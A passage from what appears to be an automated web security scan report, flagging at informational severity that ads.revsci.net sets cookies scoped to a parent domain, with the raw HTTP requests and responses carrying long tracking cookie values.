The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="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"; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_21Ju="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdtxkQw36sCSYws02VZnJBV5kVSiK63S0EPqGm20LIDE9g+EqSScZygA5IU5+z66nnzLIa4a+7jtG5zGxdSOV8gUFMvADbUUtaV0aUFiT91q+ex1xkYsKntNNFsTWgrWvRLDQLcNSXvlo3q/KRLeq1Pt82RLf/iCbh+spqJnWAahKpqVwV1XfLfMqHxF1tt52T6X4XQJnlBkHE3Wh9VIiwTsaJC/Aq2Ad3J/wZkceWWAKEdn3cBVIemRNjLVhipHrU63PvzZh1oA2XIbv8Ol1lT1LA5j01RZ5k9XwOnC5XNzrIH1oz0isg0TzZW7wAl7g+OtStP75TuAqIoBh3pzL3nxQppOZbcyJtR8i+nwcV6W1s+9zZ0DRPaAUvy5sWJvgMGsbHK8j9BLddS6cOygwoKDBjGgUkE4h+R8lM2CGp4UoY3LPcymXrjZ7ITdLnOAgrLpNZX7oWm2WLksbc/dPc3bT2Y4F87eu5WmWG9pqQDYBG2hqDGgiWihTYZaXk85vn5wkZECD9XxqHxhGQG8uMFhiHYrV7GUHEGhnycIUcbYVXFWzJw45ZcDaGP53W/7kcSo6QWWOpU8KahGIE1luvVgDDeDprU9mHMUETCH1RKpzeF2tYYoADgWg1mZhWbLysDF30A85/mk/y08a5WXIrHcUO/89jMoeG/MHpq9qi88PH++kpKpgeolkyyCmBNUjSLe6lSf98K1wSSpGYcMKKBm00r2Pa5Ax5XjA1phGc1A2q3WPty6Jc89mIViybtCsaKvucMZ0x+CUSbRyT8Eu3gB2PAGcULlu4qbqfdCM8lJvkO0NcA8ErFngNyabbIW+nngn2CAX4iGqmok7lMQR5WbOF76OYQmgvjyUwTufILzg6XUOwjgbgodQtpc3VOjVC6wKFrq+e1uyFY8XG7R72ASfx61FUCYJunZDMLz7rO5GMQn/HUUZsSij6HWuBbuWoDjZCr+YFL3SrhaoHbdNv0KWOg2DyvNHYG7oEFZ4kNjozYVWp53qst38j0OcJF6lVAmZWVUQzCDjB6FZsXpFA/rNbFXwNlA56k9MCxvwLF2xnb4n2BWu/nIGtet5cYKjqiefRfVhzOI7W+WK6xu4I4g1SldqVcN5+xGhW08iGnmBJQCtMebPuzVs57PnlNG594/4M2ZlaVgiYXVDMqpYntiVuMwLui2KlpyBieSZohEvUpgVIc866H3cPxeiwwWwKR3MyumJg0unOjSFXohJQyZmQfW5dHaNKg8SBtalXffCnIO3VO9/m+epl8h/516tdq80AR8GGHK/oH/uQgYhPup0jy4wQ3x2XxFxVHxWekwsYRFACs4Im8ipdFuKel/fDp4Wcf4/wGHvG38kNUrYRLH/5IUfh1HslclbaPeX+9U/viEhoLftEnD17Dvw0vA4q5yeBDFnd+R6E/nNj1beItLdElbAMusvIEBzs4srCP/lMhCEh1yJFUv+zuqxT43RbuNwJaYnKoQesQHlZB1DDw9lcA+eAhrOGZq2Ouse4JJqWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:05 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.5. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; 